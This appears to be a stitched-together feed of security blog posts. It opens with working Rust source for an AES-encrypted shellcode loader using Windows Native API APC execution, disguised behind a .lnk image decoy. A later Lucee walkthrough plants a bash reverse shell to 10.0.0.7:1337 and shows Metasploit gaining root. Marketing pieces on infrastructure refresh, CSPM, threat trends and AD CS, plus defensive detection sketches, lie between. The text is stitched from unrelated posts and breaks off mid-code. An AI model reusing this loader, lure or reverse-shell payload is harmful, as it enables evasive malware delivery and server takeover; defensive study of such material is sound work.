Disclaimer: this research is intended exclusively as an intellectual exercise and a means of making defenders aware of the simple possibilities with Rust malware. Using any of the provided tools or code is left to the discretion of the reader and I will not be held responsible.

As Rust becomes increasingly popular, so does its use in malware development. It includes a number of features that make it naturally more evasive than its compiled cousins, it’s been signatured less, and it’s generally easy to write in. As an experiment, I created a straightforward shellcode loader that uses Windows Native API calls for execution, encrypted shellcode that’s decrypted at runtime, and (for fun) a .lnk payload that executes the shellcode when an image is opened.



How well does this all work? The final payload uses no methods for evasion beyond those described above. I have not attempted to obfuscate strings or function calls, add junk code, etc. With that in mind, here are the results from VirusTotal. The sample run included encrypted shellcode generated by the Havoc C2 framework.

In the interest of improving evasiveness, the loader includes the shellcode encrypted with AES-256 in the final binary and decrypts it at runtime. In Rust, this can be accomplished using the libaes crate.

To quickly encrypt the shellcode to be loaded, I created an additional tool that takes a binary file, output file, key, and initialization vector to create the encrypted shellcode. You can find this tool below.

Decrypting the file at runtime is as simple as setting the key and IV used to encrypt it, recreating the cipher, and using that cipher on the loaded file.

```rust
//Set key and IV values for decryption
let key = b"This is a key and it's 32 bytes!";
let iv = b"This is 16 bytes!!";

//Recreate cipher used to encrypt shellcode
let cipher = Cipher::new_256(key);

//Read encrypted shellcode from file. The shellcode is saved as part of the binary on compilation.
let shellcode_file = include_bytes!("enc_demon.bin");

//Decrypt and save usable shellcode
let decrypted_shellcode = cipher.cbc_decrypt(iv, &shellcode_file[..]);
```

The loader itself is straightforward and takes advantage of a classic string of Windows Native API calls:

NtAllocateVirtualMemory reserves and commits a region of virtual memory in the context of the current process for the shellcode. When the memory is initially allocated, it’s done using PAGE_READWRITE (0x04) protection.

NtWriteVirtualMemory writes our shellcode to the allocated memory.

NtProtectVirtualMemory changes our allocated memory from PAGE_READWRITE to PAGE_EXECUTE_READWRITE (0x40) to make our shellcode executable.

NtQueueApcThread queues an asynchronous procedure call (APC) on the current thread, with the start of our allocated memory as the routine to run.

NtTestAlert flushes the current thread’s pending APC queue and thus executes our shellcode.
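For defenders, the order of these calls is a signal in its own right. The sketch below is a minimal illustration of that idea, not part of the loader: it assumes a hypothetical telemetry source that has already been reduced to a list of API call names (the `ApiCall` enum and `matches_loader_pattern` function are made up for this example) and checks whether the five calls appear in the order described above, allowing unrelated calls in between.

```rust
/// Native API calls of interest, as they might appear in a hypothetical telemetry trace.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum ApiCall {
    NtAllocateVirtualMemory,
    NtWriteVirtualMemory,
    NtProtectVirtualMemory,
    NtQueueApcThread,
    NtTestAlert,
    Other,
}

/// The order in which the loader described above issues its calls.
const LOADER_PATTERN: [ApiCall; 5] = [
    ApiCall::NtAllocateVirtualMemory,
    ApiCall::NtWriteVirtualMemory,
    ApiCall::NtProtectVirtualMemory,
    ApiCall::NtQueueApcThread,
    ApiCall::NtTestAlert,
];

/// Returns true if `trace` contains LOADER_PATTERN as an ordered subsequence.
/// Other calls may be interleaved between the steps.
fn matches_loader_pattern(trace: &[ApiCall]) -> bool {
    let mut next = 0;
    for call in trace {
        if next < LOADER_PATTERN.len() && *call == LOADER_PATTERN[next] {
            next += 1;
        }
    }
    next == LOADER_PATTERN.len()
}
```

A real detection would also want to look at the arguments (for example, the change to PAGE_EXECUTE_READWRITE), since each call on its own is common in legitimate software.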

In practice, the function calls are below.

```rust
unsafe {
    //Allocate memory for the shellcode
    let mut allocstart: *mut c_void = null_mut();
    let mut size: usize = decrypted_shellcode.len();
    NtAllocateVirtualMemory(
        NtCurrentProcess,
        &mut allocstart,
        0,
        &mut size,
        0x3000, //MEM_COMMIT | MEM_RESERVE
        0x04, //PAGE_READWRITE
    );

    //Write shellcode to allocated memory space
    NtWriteVirtualMemory(
        NtCurrentProcess,
        allocstart,
        decrypted_shellcode.as_ptr() as _,
        decrypted_shellcode.len() as usize,
        null_mut(),
    );

    //Change memory protection to allow execution
    let mut old_protect: u32 = 0x04;
    NtProtectVirtualMemory(
        NtCurrentProcess,
        &mut allocstart,
        &mut size,
        0x40, //PAGE_EXECUTE_READWRITE
        &mut old_protect,
    );

    //Queue an APC on the current thread that points at the shellcode
    NtQueueApcThread(
        NtCurrentThread,
        Some(std::mem::transmute(allocstart)) as PPS_APC_ROUTINE,
        allocstart,
        null_mut(),
        null_mut(),
    );

    //Run the queued APC
    NtTestAlert();
};
```

In a social engineering attack, sending an executable might raise suspicion in a target. However, we can mitigate that by adding an extra feature. By adding an extra Rust function and using a .lnk file, we can create the impression that a target is opening an image while actually running the loader in the background. This concept could easily be extended to any number of file types, such as Word documents or Excel spreadsheets, and has been seen in real-world attacks.

We’ll build an additional function into our loader that takes an image in the working directory of the process and opens it using whatever default program the user has set. In this case, the image is gnome.png.

```rust
fn pop_image() {
    //Pop gnome.png
    let image_path = format!(
        "{}/gnome.png",
        env::current_dir().unwrap().to_str().unwrap()
    );

    Command::new("cmd")
        .args(&["/C", "start", image_path.as_str()])
        .creation_flags(0x00000008) //0x00000008 DETACHED_PROCESS. Ensures cmd window doesn't pop
        .spawn()
        .expect("Failed to execute process");
}
```

This function is called in a separate thread in our loader, just before the API call to NtTestAlert:

```rust
    ...
    //Queue an APC on the current thread that points at the shellcode
    NtQueueApcThread(
        NtCurrentThread,
        Some(std::mem::transmute(allocstart)) as PPS_APC_ROUTINE,
        allocstart,
        null_mut(),
        null_mut(),
    );

    thread::spawn(move || {
        pop_image();
    });

    //Run the queued APC
    NtTestAlert();
};
```





The final payload is composed of our compiled binary, our image of choice, a .lnk file, and a .ico file to better disguise the link. Every file except for the link is set to hidden to better cover the payload.

The link file uses an absolute path to our loader as its target.

When a user double-clicks the link file, it will open the image in their default image viewer without any command window popups while executing our shellcode in the background. The final result is shown below.

With minimal additional obfuscation, the built-in features of Rust allow anyone to quickly and efficiently build a malware prototype that’s reasonably evasive out of the box. Stacking more Rust functionality on top of this, such as executing commands, allows a developer to better disguise their payload with minimal effort.

If you’re interested in experimenting with this code, I have made the repository public.

If you’re interested in learning more about Rust for offensive security, much of this project was inspired by the OffensiveRust repo from trickster0. You can find it here:

There are few things more frustrating in business than systems that don’t work as efficiently as they should. With the complexity of modern IT infrastructure, which includes a hybrid workplace, identifying whether the problem lies with software or hardware such as network switches, servers or data centers can be hard without a structured approach.

This is why a regular infrastructure refresh makes sense. It gives businesses an opportunity to conduct an audit and identify if the current infrastructure is performing well and will continue to do so in the future as the business scales. Security is another reason. Often, it’s vulnerabilities in outdated software or hardware that threat actors exploit to gain access to data centers. Ensuring systems are up to date goes a long way to improving a company’s security posture.

It’s true that cybercrime is on the increase and threat actors are becoming increasingly creative in finding ways around security efforts. While keeping ahead of security threats is a good enough reason to regularly refresh infrastructure, the benefits extend beyond that. Having the flexibility to easily expand infrastructure when needed is a major business advantage. It means that companies can take advantage of a growth opportunity with less concern about whether their systems will be up to the task of scaling when new customers come on board.

There is a wide range of technologies, including AI applications, that are geared toward helping organizations become more productive. Ensuring employees have the technologies they need and that systems are properly integrated is vital if the benefits of these productivity tools are to be realized. Conducting a refresh can pick up conflicts between new technologies and older systems and help identify where bottlenecks occur or where employees have trouble accessing necessary data.

Productivity is often linked to cost-saving targets and by doing an infrastructure refresh it may be possible to improve both. While in the short term, upgrading systems may be an expense, the longer-term cost savings gained by increased efficiency, improved security, and the ability to scale make the investment worthwhile.

Apps have become integrated into modern-day business and require well-provisioned data centers to operate efficiently. This is especially true for collaboration and time-sensitive apps when it comes to maintaining the level of productivity they’re designed for. A refresh can align the capacity of a data center with the demands of collaboration apps to maximize efficiency.

SynerComm’s approach is a three-step process done in partnership with Juniper Networks. As an industry leader, Juniper Networks has a broad range of products and services focused on helping organizations improve efficiency and security, while also achieving measurable cost savings. This makes them an ideal partner for SynerComm when conducting an infrastructure refresh.

Understanding an organization’s infrastructure needs requires network engineers to consult with relevant company stakeholders. The purpose is primarily to gain user feedback on what’s working or where inefficiencies are experienced. This is followed by a thorough analysis of all hardware and software within the network to establish where shortcomings might exist. The focus is not only ensuring that the network infrastructure meets the company’s current needs but also that it has the flexibility built in to scale or adapt to changing business needs. Careful planning helps to eliminate disruptions that could result from discovering that modifications needed can’t be made to existing systems.

A benefit of working with SynerComm is that if the audit identifies that new hardware or software is required, there is a broad range of products and services available that can be implemented, including cloud-based services. Working with a team of experienced network engineers ensures that the infrastructure will support greater levels of productivity and security. An asset management portal such as SynerComm’s AssetIT portal can also be leveraged to assist with asset management and ongoing maintenance.

Following implementation, an expert team remains available to help troubleshoot any problems that may arise and to make sure the new infrastructure is performing according to expectations.

Technology continues to evolve at a rapid pace. Ensuring that data systems and infrastructure are up to the task of supporting business functions requires a critical look at performance regularly. This includes keeping an eye out for alternative options that could provide more reliable infrastructure. Adding new technologies and apps without upgrading infrastructure can negatively impact efficiency and user experiences, both from an employee and customer perspective.

Conducting an infrastructure refresh can help identify which hardware and software are outdated and therefore impacting workflows and security. While audits should be conducted on whole networks, typically the primary areas of focus are storage systems, servers, networking equipment, and cybersecurity systems and solutions as these have the biggest impact on daily business operations.

Most importantly, refreshing infrastructure regularly improves security because it proactively identifies vulnerabilities typically found in aging hardware and software. Up-to-date infrastructure helps companies retain a stronger security posture while supporting daily operations more efficiently. It’s a worthwhile exercise, best supported by a team of expert network engineers.

For companies that want to keep ahead of IT issues to ensure that they remain agile, efficient, and more secure, regularly implementing an infrastructure refresh is an important consideration. The added benefit of this approach is that when new technologies or apps are to be implemented, the company already has up-to-date knowledge of the existing infrastructure. If it has been designed with the ability to scale, it becomes significantly easier to implement the new apps or technologies. This enables companies to move faster and reap the benefits of the new technologies ahead of competitors who may need to establish compatibility with existing infrastructure.

Ready to upgrade your infrastructure? Contact SynerComm today to refresh your systems and improve your business's efficiency, security, and scalability. Don't let outdated infrastructure hold your business back any longer - take the first step towards a more productive and secure future by scheduling your infrastructure refresh today.

Many companies host their systems and services in the cloud believing it’s more efficient to build and operate at scale. And while this may be true, the primary concern of security teams is whether this building of applications and management of systems is being done with security in mind.

The cloud does easily enable the use of new technologies and services as it is programmable and API driven. But it differs from a data center in both size and complexity in that it uses entirely different technologies. This is why specific Cloud Security Posture Management should be a priority for any business operating primarily in the cloud.

There are several aspects of cloud security that are often overlooked that could lead to vulnerabilities. These include:

Cloud Security Posture Management (CSPM) analyses the cloud infrastructure including configurations, management, and workloads, and monitors for potential issues with configurations of scripts, build processes, and overall cloud management. Specifically, it helps address the following security issues:

CSPM helps to identify misconfigurations that go against compliance. For example: If the company has a policy that says you shouldn’t have an open S3 bucket, but an administrator configures an S3 bucket without the correct security in place, CSPM can identify and alert that this vulnerability exists.
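As a rough illustration of what such a policy check boils down to, the sketch below flags buckets that violate a "no open buckets" rule. It is a simplified model, not a real CSPM or AWS API: the `BucketConfig` struct, its fields, and the `find_open_buckets` function are assumptions made up for this example, and a real tool would read these settings from the cloud provider.

```rust
/// Simplified, hypothetical view of a storage bucket's access settings.
struct BucketConfig {
    name: String,
    public_read: bool,
    public_write: bool,
}

/// Returns the names of buckets that violate a "no publicly accessible buckets" policy.
fn find_open_buckets(buckets: &[BucketConfig]) -> Vec<&str> {
    buckets
        .iter()
        .filter(|b| b.public_read || b.public_write)
        .map(|b| b.name.as_str())
        .collect()
}
```

Each name returned would be a candidate for an alert or, where the tool is allowed to act, for automatic remediation.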

If the CSPM is set up to monitor and protect, it can not only identify misconfigurations but also roll them back to shut down the vulnerability. In the process, it creates an active log showing what the root cause of non-compliance was and how it was remediated.

Knowing what’s happening in the broader industry helps to identify vulnerabilities and alert on changes that need to be made. This helps with compliance and also ensures that security teams don’t overlook vulnerabilities because they aren’t aware of them.

Conducting scans and audits to ensure compliance are good practices, but the reality is that security in the cloud is constantly evolving. No company can ever be sure that they’re 100% safe from a breach just because they’ve completed an audit. Continuous monitoring is necessary to try to keep ahead of threats and ensure that you’re able to quickly identify any vulnerabilities.

One of the common uses of CSPM is to be able to identify a lack of encryption at rest or in transit. Often HTTP is set as a default and this doesn’t get updated when it should. If this isn’t identified it can create a major problem further down the line.

In the cloud, improper key management can create vulnerabilities. One way to mitigate this is to rotate keys regularly, so that if one does get out there, its useful life is limited. CSPM also offers the capability to automatically take keys out of rotation.
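The rotation logic itself is simple to picture. The following is a minimal sketch under stated assumptions: the `AccessKey` record, the day-based age, and the `retire_stale_keys` function are hypothetical and stand in for whatever inventory a CSPM tool actually maintains.

```rust
/// Hypothetical record for an access key; age is measured in whole days.
struct AccessKey {
    id: String,
    age_days: u32,
    active: bool,
}

/// Deactivates every active key older than `max_age_days` and returns
/// the ids of the keys that were taken out of rotation.
fn retire_stale_keys(keys: &mut [AccessKey], max_age_days: u32) -> Vec<String> {
    let mut retired = Vec::new();
    for key in keys.iter_mut() {
        if key.active && key.age_days > max_age_days {
            key.active = false;
            retired.push(key.id.clone());
        }
    }
    retired
}
```

The maximum age is a policy decision; 90 days is a common choice, but nothing in this sketch depends on that value.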

Companies frequently ask for an audit of all account permissions and this often identifies that some users have permissions and access that they shouldn’t. This can be an oversight when roles are assigned or for example when a developer asks for access to a specific project but those permissions are never pulled back once the project has been completed.
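The developer example can be expressed as a small audit over access grants. This is an illustrative sketch only: the `Grant` struct and `stale_grants` function are hypothetical, and the list of completed projects is assumed to come from some project tracking system.

```rust
use std::collections::HashSet;

/// Hypothetical access grant tying a user to a project.
struct Grant {
    user: String,
    project: String,
}

/// Returns (user, project) pairs whose project has been completed,
/// i.e. access that was granted for a project and never pulled back.
fn stale_grants<'a>(grants: &'a [Grant], completed: &HashSet<&str>) -> Vec<(&'a str, &'a str)> {
    grants
        .iter()
        .filter(|g| completed.contains(g.project.as_str()))
        .map(|g| (g.user.as_str(), g.project.as_str()))
        .collect()
}
```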

Ensuring that MFA is activated on critical accounts is important and CSPM can run an audit to ensure that security protocols such as MFA are being implemented. The same applies to misconfigurations and data storage that is exposed to the internet. Having a way to continually monitor and dig into what is happening in cloud systems and alert on non-compliance can significantly improve a company’s security posture.

Advanced CSPM tools go beyond this by showing how an incident was detected, where it was identified, and how to fix it, along with an explanation of why it should be fixed.

There are multiple vendors offering a range of services, and it’s good to keep in mind not to have all systems tied to a single vendor. If that vendor has unknown vulnerabilities, they can impact your company's security. With multiple vendors monitoring, they’re more likely to pick up on these, which reduces the risk exposure.

To hear a more detailed discussion on the topic of CSPM, tune into the podcast with Aaron Howell, a managing consultant of the MAI team with over 15 years of IT security focus. Link: https://www.youtube.com/watch?v=9XNdB4zDMjg



Lucee is an open-source ColdFusion Markup Language (CFML) application server and engine intended for rapid development and deployment. It provides a lot of out-of-the-box functionality (tags and functions) to help build web applications. However, if an attacker has access to the Lucee dashboard, these very same functions allow an attacker to execute commands on the backend server.

Successful exploitation of the scheduled tasks is predicated on having access to the web admin dashboard. The password may be acquired through path traversal, a default password, or other means.

Though there are multiple methods for achieving command execution, this method abuses two key features: The cfexecute function and scheduled tasks.



Lucee’s implementation of ColdFusion allows for server-side code execution to create dynamic pages. More importantly, Lucee allows in-line scripts to execute shell commands through the cfexecute function. When placed in a cfscript tag, it’s possible to execute any command as if it were in a PowerShell or Command Prompt window. For example, placing the following cfscript tag in a file called test.cfm and accessing it at the webroot is the equivalent of executing whoami on the backend:

```cfm
<cfscript>
cfexecute(name="/bin/bash", arguments="-c 'whoami'",timeout=5);
</cfscript>
```



Of course, to perform this an attacker would need a way of loading a cfm file into the webroot. That’s where scheduled tasks come in; Lucee allows admins to create scheduled tasks that regularly query the same remote web page. In a legitimate use case, this would allow a user to access pages that publish data without waiting for a database transaction. For our purposes, scheduled tasks have an option to save the queried remote file, functioning as an arbitrary file upload.

With these two features combined, we can create a document that executes a shell command and save it to the server’s web root through scheduled jobs. When we access it, our commands are executed.
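Because the technique depends on a file containing cfexecute landing in the web root, defenders can hunt for exactly that. The function below is a minimal sketch of such a check, assuming the contents of a .cfm file have already been read into a string; `find_cfexecute_lines` is a name invented for this example, and a plain substring match will also flag legitimate uses and comments.

```rust
/// Returns the 1-based line numbers in a CFML source that mention `cfexecute`.
/// The match is case-insensitive because CFML tag and function names are.
fn find_cfexecute_lines(source: &str) -> Vec<usize> {
    source
        .lines()
        .enumerate()
        .filter(|(_, line)| line.to_ascii_lowercase().contains("cfexecute"))
        .map(|(idx, _)| idx + 1)
        .collect()
}
```

Running this over files recently written to the web root, especially ones whose names match a scheduled task, would be a reasonable starting point for triage.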

To set up our test environment, we’ll spin up a new Docker container with Lucee.

https://github.com/isapir/lucee-docker

```shell
git clone https://github.com/isapir/lucee-docker.git
cd lucee-docker

docker image build . \
    -t isapir/lucee-8080 \
    --build-arg LUCEE_ADMIN_PASSWORD=admin123

docker container run -p 8080:8080 isapir/lucee-8080
```

The Lucee admin panel should now be accessible at http://127.0.0.1:8080/lucee/admin/web.cfm

We’ll start by creating a simple bash reverse shell that connects back to our host machine and host it on a Python web server.

```
┌──(kali㉿kali)-[~]
└─$ cat exploit.cfm
<cfscript>
cfexecute(name="/bin/bash", arguments="-c '/bin/bash -i >& /dev/tcp/10.0.0.7/1337 0>&1'",timeout=5);
</cfscript>

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server --cgi 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```



From there, we’ll access the Lucee dashboard and create our scheduled job.



The scheduled job must then be manually updated to enable logging and choose the location to save our file. The web root of the server can be found at the bottom of the Overview page.



Returning to the Scheduled Tasks page, execute the job and we’ll receive a request to our HTTP server.



Starting a netcat listener and accessing exploit.cfm at the web root, we receive a reverse shell.

There’s now a Metasploit module available for this! The module works for both Unix and Windows hosts and can execute commands just like above, including reverse shells, while existing modules for Lucee only work on Unix hosts.

```
msf6 > use exploit/multi/http/lucee_scheduled_job
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/lucee_scheduled_job) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
target => 1
msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/lucee_scheduled_job) > set SRVPORT 8081
SRVPORT => 8081
msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.19.145:4444
[+] Authenticated successfully
[*] Using URL: http://192.168.19.145:8081/IMcleq0t3XJmV2zT.cfm
[+] Job IMcleq0t3XJmV2zT created successfully
[+] Job IMcleq0t3XJmV2zT updated successfully
[*] Executing scheduled job: IMcleq0t3XJmV2zT
[+] Job IMcleq0t3XJmV2zT executed successfully
[*] Attempting to access payload...
[*] Payload request received for /IMcleq0t3XJmV2zT.cfm?RequestTimeout=50 from 192.168.19.145
[*] Attempting to access payload...
[*] Received 500 response from IMcleq0t3XJmV2zT.cfm Check your listener!
[+] Exploit completed.
[*] Removing scheduled job IMcleq0t3XJmV2zT
[+] Scheduled job removed.
[+] Deleted /srv/www/app/webroot/IMcleq0t3XJmV2zT.cfm
[*] Command shell session 1 opened (192.168.19.145:4444 -> 192.168.19.145:55442) at 2023-03-02 10:31:19 -0600
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
```

https://docs.lucee.org/reference/tags/script.html

https://docs.lucee.org/reference/tags/execute.html

https://github.com/isapir/lucee-docker

The most recent quarterly threat report issued by Expel at the end of 2022 revealed some interesting trends in cyberattacks. It highlights how attack methodologies are constantly changing and is a reminder to never be complacent.

Security efforts require more than putting policies, systems and software in place. As detection and defence capabilities ramp up on one form of attack, cyber criminals divert to other attack paths and defence efforts need to adapt. When they don’t, it becomes all too easy for attackers to find and exploit vulnerabilities.

The Expel Threat Report indicates that attackers have shifted away from targeting endpoints with malware. Instead, they’re focusing on identities and using phishing emails and other methods to compromise employee credentials.

Currently, targeting identities accounts for 60% of attacks. Once attackers have a compromised identity, they use this to break into other company systems, such as payroll, with the ultimate goal of getting onto that payroll and extracting money from the company.

Being able to get onto company systems via a compromised email account is proving to be a very viable attack path. With a compromised identity, attackers will often sit and observe what access a user has into company systems and how they might exploit this. They’re patient and determined.

Can MFA help or do vulnerabilities remain?

One of the ways in which companies try to improve email security is to implement a multi-factor authentication (MFA) policy. This can be very effective in reducing the risk of attack. However, recent trends indicate that attackers are now leveraging MFA fatigue to gain access to emails and employee identities. They do this by relentlessly and repeatedly sending push notifications requesting authorisation, until the user is so fatigued by this that they grant the request.

Once the attacker has access, they can easily navigate various company systems because their identity is seen to be valid and verified, having passed MFA. This type of attack can be discovered by monitoring for high volumes of push notifications. Some MFA providers have a way to report this and are working on solutions to address this type of attack. In the meantime, employees need to be trained to be wary of multiple requests and to report them rather than assume it’s a system error and simply approve them. When an MFA bypass is discovered, the remedy is to shut that identity down, isolate the account, and then investigate what access may have been gained and what vulnerabilities exist as a result.
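Monitoring for high volumes of push notifications can be as simple as counting pushes per user in a sliding time window. The sketch below shows one way this might look; the `PushEvent` struct, the `flag_push_fatigue` function, and the idea that events arrive as a flat list with timestamps in seconds are all assumptions for illustration, and the window and threshold would need tuning against real traffic.

```rust
use std::collections::HashMap;

/// A push notification sent to `user` at `timestamp` (seconds since an arbitrary epoch).
struct PushEvent {
    user: String,
    timestamp: u64,
}

/// Returns the users who received more than `threshold` pushes within any
/// span of `window_secs` seconds, sorted alphabetically.
fn flag_push_fatigue(events: &[PushEvent], window_secs: u64, threshold: usize) -> Vec<String> {
    // Group timestamps by user.
    let mut per_user: HashMap<&str, Vec<u64>> = HashMap::new();
    for event in events {
        per_user.entry(event.user.as_str()).or_default().push(event.timestamp);
    }

    let mut flagged = Vec::new();
    for (user, times) in per_user.iter_mut() {
        times.sort_unstable();
        // Slide a window [start, end] over the sorted timestamps.
        let mut start = 0;
        for end in 0..times.len() {
            while times[end] - times[start] > window_secs {
                start += 1;
            }
            if end - start + 1 > threshold {
                flagged.push(user.to_string());
                break;
            }
        }
    }
    flagged.sort();
    flagged
}
```

A flagged user is a prompt for investigation, not proof of compromise: the same pattern can come from a misbehaving client that retries authentication.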

Does monitoring IP addresses help?

A past approach to monitoring for atypical authentication activity was to take into consideration what IP address the request originated from. It used to be a relatively easy security approach to flag and even block activity from IP addresses that originated from certain countries known for cybercriminal activity. It was a good approach in theory, but like MFA, it’s become very easy to bypass using legitimate tools such as a VPN. A VPN will show a legitimate US-based IP address which won’t get flagged as being one to watch. This highlights how conditional access based on the geolocation of an IP address isn’t enough.

There’s a whole underground of brokers eager to sell off compromised credentials and identities. Combined with a local IP address, it makes it easier for attackers to bypass basic alerts. This is why security remains a complex task that requires a multi-pronged defence approach.

What’s the minimum needed for better security?

Cybersecurity insurance guidelines are often used to identify what the minimum requirements are for security systems and policies. Currently this includes recommendations such as Endpoint Detection and Response (EDR) or Managed Detection and Response (MDR) combined with MFA policies, and regular employee security training. Ultimately the goal is for whatever tools and systems are in place, to be generating value for the company.

Being able to monitor systems, check activity logs, gain visibility into endpoints and check accessibility, that is, knowing what’s happening in terms of authentication, is really valuable. For companies that have cloud-based systems, it’s important to be able to see cloud trails and activity surrounding new email accounts or API requests.

There is no one-size-fits-all security solution and most companies will continue to make use of multiple security tools, products and services. They have to, because regardless of whether they operate in the cloud or with more traditional servers, attackers are continually adapting, looking for ways to get around whatever security a company has in place.

A new approach is to have a managed vulnerability service that can alert companies to changing attack paths being used to gain authentication. This can help companies identify where they may be vulnerable and what they can do to beef up security in that area of business.

Ultimately, it’s about closing the window of opportunity for attackers and making it harder for them to access systems or get authentication. It requires agility and constant learning, keeping up to date with what could be seen as a vulnerability and exploited.

If you’d like to hear more on this topic, you can listen to a recent IT Trendsetters podcast: https://www.youtube.com/watch?v=1QXk_zcSfuc which discusses the different approaches to flagging atypical authentication requests and how to deal with them.

Active Directory Certificate Services (AD CS) is a key element of encryption services on Windows domains. It enables file, email and network traffic encryption capabilities and provides organizations with the ability to build a public key infrastructure (PKI) to support digital signatures and certificates. Unfortunately, as much as AD CS is designed to improve security, it’s all too easy to circumvent, resulting in vulnerabilities that cyber criminals easily exploit.

A SpecterOps research report released in June 2021 identified that this could take place through eight common misconfigurations, leading to privilege escalation on an active domain. Abuse of privileges was another common path. Further research resulted in a CVE (CVE-2022-26923, known as Certifried), which highlighted how an affected default template created by Microsoft could lead to elevation. As this is a relatively new attack surface, research is still ongoing.

To date, three main categories have been identified as common paths of attack.

The first of these is misconfigured templates which then become exploitable. A misconfigured template can create a direct path for privilege elevation due to insecure settings. Through user or group membership it may also be possible to escalate privileges which would be viewed as abuse of privileges. Changes made to a default template could also result in it being less secure.

The second common category of attack relates to web enrolment and attack chains. Most often these are implemented using NTLM relays, which enable attackers to position themselves between clients and servers to relay authentication requests. Once these requests are validated, attackers gain access to network services. An attack method that highlighted this vulnerability was PetitPotam, which results in the server believing the attacker is a legitimate and authenticated user because they’ve been able to hijack the certification process.

A third way attackers gain access to a server is through exploitable default templates. An example of this is Certifried CVE-2022-26923, which led to further research into a template that was inherently vulnerable. In this case it’s possible for domain computers to enrol a machine template. Domain users can create a domain computer and any domain user can then elevate privileges.

Misconfiguration usually relates to SSL certificates valid for more than one host, system or domain. This happens when a template allows an enrolee to supply a Subject Alternative Name (SAN) for any machine or user. Therefore, if you see a SAN warning pop up, think twice before enabling it. If certificates are also being used for authentication, it can create a vulnerability that gives an attacker validated access to multiple systems or domains.
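An audit for this condition comes down to checking a few template attributes together. The sketch below is a simplified illustration: the `Template` struct is a hypothetical snapshot of values that would normally be read from Active Directory, while the flag values and the Client Authentication OID are the documented ones for the msPKI-Certificate-Name-Flag attribute, the msPKI-Enrollment-Flag attribute and the extended key usage. It ignores who is allowed to enrol, which a full review would also need to consider.

```rust
/// msPKI-Certificate-Name-Flag bit: the enrolee may supply the subject and SAN.
const CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: u32 = 0x0000_0001;
/// msPKI-Enrollment-Flag bit: requests are held for CA manager approval.
const CT_FLAG_PEND_ALL_REQUESTS: u32 = 0x0000_0002;
/// Extended key usage OID for Client Authentication.
const EKU_CLIENT_AUTH: &str = "1.3.6.1.5.5.7.3.2";

/// Hypothetical, simplified snapshot of a certificate template's attributes.
struct Template {
    name: String,
    certificate_name_flag: u32,
    enrollment_flag: u32,
    ekus: Vec<String>,
}

/// True if the template lets an enrolee choose the SAN, can be used for
/// authentication, and does not require manager approval.
fn allows_arbitrary_san_auth(t: &Template) -> bool {
    let enrollee_supplies_subject = (t.certificate_name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) != 0;
    let needs_approval = (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS) != 0;
    let usable_for_auth = t.ekus.iter().any(|e| e.as_str() == EKU_CLIENT_AUTH);
    enrollee_supplies_subject && usable_for_auth && !needs_approval
}

/// Returns the names of templates that match the risky combination above.
fn risky_templates(templates: &[Template]) -> Vec<&str> {
    templates
        .iter()
        .filter(|t| allows_arbitrary_san_auth(t))
        .map(|t| t.name.as_str())
        .collect()
}
```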

Often the first steps to remediation are to make a careful review of privileges and settings. For example: to reduce the risk of attacks through web enrolment, it’s possible to turn web enrolment off entirely. If you do still need web enrolment, it’s possible to enable Extended Protection for Authentication (EPA) on web enrolment. This would then block NTLM relay attacks on Integrated Windows Authentication (IWA). As part of this process be sure to disable HTTP on Web Enrolment and to instead use an IIS feature that uses HTTPS (TLS).

For Coercion Vulnerabilities it’s best to install available patches. As these threats evolve, new patches will become available, so it’s important to keep up to date.

Certificate Attacks use an entirely different attack vector and are often a result of an administrator error. This means that vulnerabilities are created when default templates are changed. Sometimes administrators are simply not aware of the security risks associated with the changes that they make. But often it’s a mistake made during testing deployment, or when a custom template is left enabled and forgotten during testing.

In an Escalation 4 (ESC4) type of attack, write privileges are obtained. These privileges are then exploited to create vulnerabilities in templates. Some of the ways that this is done are by disabling manager approvals or increasing the validity period of a certificate. It can even lead to persistent elevated access after a manager changes their password. If this is found to be the case during an incident response, the remediation is to revoke the certificate entirely. Other forms of remediation are to conduct a security audit and to implement the principle of least privilege. It’s common for an AD CS administrator to have write privileges, but not others. It’s possible they may have been activated during testing and then not removed, but any other user or group that has write privileges should be fully investigated.
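The audit step described above can be sketched as a simple filter over a template's access control entries. This is a minimal Rust sketch, assuming the permissions have already been exported into a hypothetical `Ace` list; the `Right` enum, the principal names and the approved list are illustrative and not taken from any particular tool.

```rust
// Simplified set of rights an entry can grant on a certificate template.
#[derive(Debug, Clone, Copy, PartialEq)]
enum Right {
    Read,
    Enroll,
    WriteProperty,
    WriteDacl,
    WriteOwner,
    GenericAll,
}

// Hypothetical access control entry: who holds which right on the template.
struct Ace {
    principal: String,
    right: Right,
}

// Rights that would let a principal modify the template.
fn grants_write(right: Right) -> bool {
    matches!(
        right,
        Right::WriteProperty | Right::WriteDacl | Right::WriteOwner | Right::GenericAll
    )
}

// Returns the sorted, de-duplicated principals that hold write-type rights
// but are not on the approved list (names compared case-insensitively).
fn unexpected_writers<'a>(aces: &'a [Ace], approved: &[&str]) -> Vec<&'a str> {
    let mut found: Vec<&'a str> = aces
        .iter()
        .filter(|ace| grants_write(ace.right))
        .map(|ace| ace.principal.as_str())
        .filter(|name| !approved.iter().any(|ok| ok.eq_ignore_ascii_case(name)))
        .collect();
    found.sort();
    found.dedup();
    found
}

fn main() {
    // Made-up principals, purely for demonstration.
    let acl = vec![
        Ace { principal: "CORP\\PKI Admins".to_string(), right: Right::GenericAll },
        Ace { principal: "CORP\\Domain Users".to_string(), right: Right::Enroll },
        Ace { principal: "CORP\\Auditors".to_string(), right: Right::Read },
        Ace { principal: "CORP\\Helpdesk".to_string(), right: Right::WriteDacl },
    ];
    for principal in unexpected_writers(&acl, &["CORP\\PKI Admins"]) {
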